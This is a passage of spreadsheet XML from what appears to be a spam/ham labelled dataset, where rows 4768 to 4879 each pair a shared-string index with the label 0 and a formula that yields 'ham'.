        <v>ham</v>
      </c>
    </row>
    <row r="4768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4768" t="s">
        <v>4118</v>
      </c>
      <c r="B4768">
        <v>0</v>
      </c>
      <c r="C4768" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4769" t="s">
        <v>4119</v>
      </c>
      <c r="B4769">
        <v>0</v>
      </c>
      <c r="C4769" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4770" t="s">
        <v>4120</v>
      </c>
      <c r="B4770">
        <v>0</v>
      </c>
      <c r="C4770" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4771" t="s">
        <v>4121</v>
      </c>
      <c r="B4771">
        <v>0</v>
      </c>
      <c r="C4771" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4772" t="s">
        <v>4122</v>
      </c>
      <c r="B4772">
        <v>0</v>
      </c>
      <c r="C4772" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4773" t="s">
        <v>4123</v>
      </c>
      <c r="B4773">
        <v>0</v>
      </c>
      <c r="C4773" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4774" t="s">
        <v>4124</v>
      </c>
      <c r="B4774">
        <v>0</v>
      </c>
      <c r="C4774" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4775" t="s">
        <v>4125</v>
      </c>
      <c r="B4775">
        <v>0</v>
      </c>
      <c r="C4775" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4776" t="s">
        <v>4126</v>
      </c>
      <c r="B4776">
        <v>0</v>
      </c>
      <c r="C4776" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4777" t="s">
        <v>4127</v>
      </c>
      <c r="B4777">
        <v>0</v>
      </c>
      <c r="C4777" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4778" t="s">
        <v>4128</v>
      </c>
      <c r="B4778">
        <v>0</v>
      </c>
      <c r="C4778" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4779" t="s">
        <v>4129</v>
      </c>
      <c r="B4779">
        <v>0</v>
      </c>
      <c r="C4779" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4780" t="s">
        <v>4130</v>
      </c>
      <c r="B4780">
        <v>0</v>
      </c>
      <c r="C4780" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4781" t="s">
        <v>4131</v>
      </c>
      <c r="B4781">
        <v>0</v>
      </c>
      <c r="C4781" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4782" t="s">
        <v>4132</v>
      </c>
      <c r="B4782">
        <v>0</v>
      </c>
      <c r="C4782" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4783" t="s">
        <v>4133</v>
      </c>
      <c r="B4783">
        <v>0</v>
      </c>
      <c r="C4783" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4784" t="s">
        <v>4134</v>
      </c>
      <c r="B4784">
        <v>0</v>
      </c>
      <c r="C4784" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4785" t="s">
        <v>4135</v>
      </c>
      <c r="B4785">
        <v>0</v>
      </c>
      <c r="C4785" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4786" t="s">
        <v>4136</v>
      </c>
      <c r="B4786">
        <v>0</v>
      </c>
      <c r="C4786" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4787" t="s">
        <v>4137</v>
      </c>
      <c r="B4787">
        <v>0</v>
      </c>
      <c r="C4787" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4788" t="s">
        <v>4138</v>
      </c>
      <c r="B4788">
        <v>0</v>
      </c>
      <c r="C4788" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4789" t="s">
        <v>4139</v>
      </c>
      <c r="B4789">
        <v>0</v>
      </c>
      <c r="C4789" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4790" t="s">
        <v>4140</v>
      </c>
      <c r="B4790">
        <v>0</v>
      </c>
      <c r="C4790" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4791" t="s">
        <v>4141</v>
      </c>
      <c r="B4791">
        <v>0</v>
      </c>
      <c r="C4791" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4792" t="s">
        <v>4142</v>
      </c>
      <c r="B4792">
        <v>0</v>
      </c>
      <c r="C4792" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4793" t="s">
        <v>4143</v>
      </c>
      <c r="B4793">
        <v>0</v>
      </c>
      <c r="C4793" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4794" t="s">
        <v>4144</v>
      </c>
      <c r="B4794">
        <v>0</v>
      </c>
      <c r="C4794" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4795" t="s">
        <v>4145</v>
      </c>
      <c r="B4795">
        <v>0</v>
      </c>
      <c r="C4795" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4796" t="s">
        <v>4146</v>
      </c>
      <c r="B4796">
        <v>0</v>
      </c>
      <c r="C4796" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4797" t="s">
        <v>4147</v>
      </c>
      <c r="B4797">
        <v>0</v>
      </c>
      <c r="C4797" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4798" t="s">
        <v>4148</v>
      </c>
      <c r="B4798">
        <v>0</v>
      </c>
      <c r="C4798" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4799" t="s">
        <v>4149</v>
      </c>
      <c r="B4799">
        <v>0</v>
      </c>
      <c r="C4799" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4800" t="s">
        <v>4150</v>
      </c>
      <c r="B4800">
        <v>0</v>
      </c>
      <c r="C4800" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4801" t="s">
        <v>4151</v>
      </c>
      <c r="B4801">
        <v>0</v>
      </c>
      <c r="C4801" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4802" t="s">
        <v>4152</v>
      </c>
      <c r="B4802">
        <v>0</v>
      </c>
      <c r="C4802" t="str">
        <f t="shared" ref="C4802:C4865" si="75">IF(B4802="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4803" t="s">
        <v>4153</v>
      </c>
      <c r="B4803">
        <v>0</v>
      </c>
      <c r="C4803" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4804" t="s">
        <v>4154</v>
      </c>
      <c r="B4804">
        <v>0</v>
      </c>
      <c r="C4804" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4805" t="s">
        <v>4155</v>
      </c>
      <c r="B4805">
        <v>0</v>
      </c>
      <c r="C4805" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4806" t="s">
        <v>4156</v>
      </c>
      <c r="B4806">
        <v>0</v>
      </c>
      <c r="C4806" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4807" t="s">
        <v>4157</v>
      </c>
      <c r="B4807">
        <v>0</v>
      </c>
      <c r="C4807" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4808" t="s">
        <v>4158</v>
      </c>
      <c r="B4808">
        <v>0</v>
      </c>
      <c r="C4808" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4809" t="s">
        <v>4159</v>
      </c>
      <c r="B4809">
        <v>0</v>
      </c>
      <c r="C4809" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4810" t="s">
        <v>4160</v>
      </c>
      <c r="B4810">
        <v>0</v>
      </c>
      <c r="C4810" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4811" t="s">
        <v>4161</v>
      </c>
      <c r="B4811">
        <v>0</v>
      </c>
      <c r="C4811" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4812" t="s">
        <v>4162</v>
      </c>
      <c r="B4812">
        <v>0</v>
      </c>
      <c r="C4812" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4813" t="s">
        <v>4163</v>
      </c>
      <c r="B4813">
        <v>0</v>
      </c>
      <c r="C4813" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4814" t="s">
        <v>4164</v>
      </c>
      <c r="B4814">
        <v>0</v>
      </c>
      <c r="C4814" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4815" t="s">
        <v>4165</v>
      </c>
      <c r="B4815">
        <v>0</v>
      </c>
      <c r="C4815" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4816" t="s">
        <v>4166</v>
      </c>
      <c r="B4816">
        <v>0</v>
      </c>
      <c r="C4816" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4817" t="s">
        <v>4167</v>
      </c>
      <c r="B4817">
        <v>0</v>
      </c>
      <c r="C4817" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4818" t="s">
        <v>4168</v>
      </c>
      <c r="B4818">
        <v>0</v>
      </c>
      <c r="C4818" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4819" t="s">
        <v>4169</v>
      </c>
      <c r="B4819">
        <v>0</v>
      </c>
      <c r="C4819" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4820" t="s">
        <v>4170</v>
      </c>
      <c r="B4820">
        <v>0</v>
      </c>
      <c r="C4820" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4821" t="s">
        <v>4171</v>
      </c>
      <c r="B4821">
        <v>0</v>
      </c>
      <c r="C4821" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4822" t="s">
        <v>4172</v>
      </c>
      <c r="B4822">
        <v>0</v>
      </c>
      <c r="C4822" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4823" t="s">
        <v>4173</v>
      </c>
      <c r="B4823">
        <v>0</v>
      </c>
      <c r="C4823" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4824" t="s">
        <v>4174</v>
      </c>
      <c r="B4824">
        <v>0</v>
      </c>
      <c r="C4824" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4825" t="s">
        <v>4175</v>
      </c>
      <c r="B4825">
        <v>0</v>
      </c>
      <c r="C4825" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4826" t="s">
        <v>4176</v>
      </c>
      <c r="B4826">
        <v>0</v>
      </c>
      <c r="C4826" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4827" t="s">
        <v>4177</v>
      </c>
      <c r="B4827">
        <v>0</v>
      </c>
      <c r="C4827" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4828" t="s">
        <v>4178</v>
      </c>
      <c r="B4828">
        <v>0</v>
      </c>
      <c r="C4828" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4829" t="s">
        <v>4179</v>
      </c>
      <c r="B4829">
        <v>0</v>
      </c>
      <c r="C4829" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4830" t="s">
        <v>4180</v>
      </c>
      <c r="B4830">
        <v>0</v>
      </c>
      <c r="C4830" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4831" t="s">
        <v>4181</v>
      </c>
      <c r="B4831">
        <v>0</v>
      </c>
      <c r="C4831" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4832" t="s">
        <v>4182</v>
      </c>
      <c r="B4832">
        <v>0</v>
      </c>
      <c r="C4832" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4833" t="s">
        <v>4183</v>
      </c>
      <c r="B4833">
        <v>0</v>
      </c>
      <c r="C4833" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4834" t="s">
        <v>4184</v>
      </c>
      <c r="B4834">
        <v>0</v>
      </c>
      <c r="C4834" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4835" t="s">
        <v>4185</v>
      </c>
      <c r="B4835">
        <v>0</v>
      </c>
      <c r="C4835" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4836" t="s">
        <v>4186</v>
      </c>
      <c r="B4836">
        <v>0</v>
      </c>
      <c r="C4836" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4837" t="s">
        <v>4187</v>
      </c>
      <c r="B4837">
        <v>0</v>
      </c>
      <c r="C4837" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4838" t="s">
        <v>4188</v>
      </c>
      <c r="B4838">
        <v>0</v>
      </c>
      <c r="C4838" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4839" t="s">
        <v>4189</v>
      </c>
      <c r="B4839">
        <v>0</v>
      </c>
      <c r="C4839" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4840" t="s">
        <v>4190</v>
      </c>
      <c r="B4840">
        <v>0</v>
      </c>
      <c r="C4840" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4841" t="s">
        <v>4191</v>
      </c>
      <c r="B4841">
        <v>0</v>
      </c>
      <c r="C4841" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4842" t="s">
        <v>4192</v>
      </c>
      <c r="B4842">
        <v>0</v>
      </c>
      <c r="C4842" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4843" t="s">
        <v>4193</v>
      </c>
      <c r="B4843">
        <v>0</v>
      </c>
      <c r="C4843" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4844" t="s">
        <v>4194</v>
      </c>
      <c r="B4844">
        <v>0</v>
      </c>
      <c r="C4844" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4845" t="s">
        <v>4195</v>
      </c>
      <c r="B4845">
        <v>0</v>
      </c>
      <c r="C4845" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4846" t="s">
        <v>4196</v>
      </c>
      <c r="B4846">
        <v>0</v>
      </c>
      <c r="C4846" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4847" t="s">
        <v>4197</v>
      </c>
      <c r="B4847">
        <v>0</v>
      </c>
      <c r="C4847" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4848" t="s">
        <v>4198</v>
      </c>
      <c r="B4848">
        <v>0</v>
      </c>
      <c r="C4848" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4849" t="s">
        <v>4199</v>
      </c>
      <c r="B4849">
        <v>0</v>
      </c>
      <c r="C4849" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4850" t="s">
        <v>4200</v>
      </c>
      <c r="B4850">
        <v>0</v>
      </c>
      <c r="C4850" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4851" t="s">
        <v>4201</v>
      </c>
      <c r="B4851">
        <v>0</v>
      </c>
      <c r="C4851" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4852" t="s">
        <v>4202</v>
      </c>
      <c r="B4852">
        <v>0</v>
      </c>
      <c r="C4852" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4853" t="s">
        <v>4203</v>
      </c>
      <c r="B4853">
        <v>0</v>
      </c>
      <c r="C4853" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4854" t="s">
        <v>4204</v>
      </c>
      <c r="B4854">
        <v>0</v>
      </c>
      <c r="C4854" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4855" t="s">
        <v>4205</v>
      </c>
      <c r="B4855">
        <v>0</v>
      </c>
      <c r="C4855" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4856" t="s">
        <v>4206</v>
      </c>
      <c r="B4856">
        <v>0</v>
      </c>
      <c r="C4856" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4857" t="s">
        <v>4207</v>
      </c>
      <c r="B4857">
        <v>0</v>
      </c>
      <c r="C4857" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4858" t="s">
        <v>4208</v>
      </c>
      <c r="B4858">
        <v>0</v>
      </c>
      <c r="C4858" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4859" t="s">
        <v>4209</v>
      </c>
      <c r="B4859">
        <v>0</v>
      </c>
      <c r="C4859" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4860" t="s">
        <v>4210</v>
      </c>
      <c r="B4860">
        <v>0</v>
      </c>
      <c r="C4860" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4861" t="s">
        <v>4211</v>
      </c>
      <c r="B4861">
        <v>0</v>
      </c>
      <c r="C4861" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4862" t="s">
        <v>4212</v>
      </c>
      <c r="B4862">
        <v>0</v>
      </c>
      <c r="C4862" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4863" t="s">
        <v>4213</v>
      </c>
      <c r="B4863">
        <v>0</v>
      </c>
      <c r="C4863" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4864" t="s">
        <v>4214</v>
      </c>
      <c r="B4864">
        <v>0</v>
      </c>
      <c r="C4864" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4865" t="s">
        <v>4215</v>
      </c>
      <c r="B4865">
        <v>0</v>
      </c>
      <c r="C4865" t="str">
        <f t="shared" si="75"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4866" t="s">
        <v>4216</v>
      </c>
      <c r="B4866">
        <v>0</v>
      </c>
      <c r="C4866" t="str">
        <f t="shared" ref="C4866:C4929" si="76">IF(B4866="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4867" t="s">
        <v>4217</v>
      </c>
      <c r="B4867">
        <v>0</v>
      </c>
      <c r="C4867" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4868" t="s">
        <v>4218</v>
      </c>
      <c r="B4868">
        <v>0</v>
      </c>
      <c r="C4868" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4869" t="s">
        <v>4219</v>
      </c>
      <c r="B4869">
        <v>0</v>
      </c>
      <c r="C4869" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4870" t="s">
        <v>4220</v>
      </c>
      <c r="B4870">
        <v>0</v>
      </c>
      <c r="C4870" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4871" t="s">
        <v>4221</v>
      </c>
      <c r="B4871">
        <v>0</v>
      </c>
      <c r="C4871" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4872" t="s">
        <v>4222</v>
      </c>
      <c r="B4872">
        <v>0</v>
      </c>
      <c r="C4872" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4873" t="s">
        <v>4223</v>
      </c>
      <c r="B4873">
        <v>0</v>
      </c>
      <c r="C4873" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4874" t="s">
        <v>4224</v>
      </c>
      <c r="B4874">
        <v>0</v>
      </c>
      <c r="C4874" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4875" t="s">
        <v>4225</v>
      </c>
      <c r="B4875">
        <v>0</v>
      </c>
      <c r="C4875" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4876" t="s">
        <v>4226</v>
      </c>
      <c r="B4876">
        <v>0</v>
      </c>
      <c r="C4876" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4877" t="s">
        <v>4227</v>
      </c>
      <c r="B4877">
        <v>0</v>
      </c>
      <c r="C4877" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4878" t="s">
        <v>4228</v>
      </c>
      <c r="B4878">
        <v>0</v>
      </c>
      <c r="C4878" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4879" t="s">
        <v>4229</v>
      </c>
      <c r="B4879">
        <v>0</v>
      </c>
      <c r="C4879" t="str">
        <f t="shared" si="76"/>
        <v>ham</v>
      </c>
    </row>
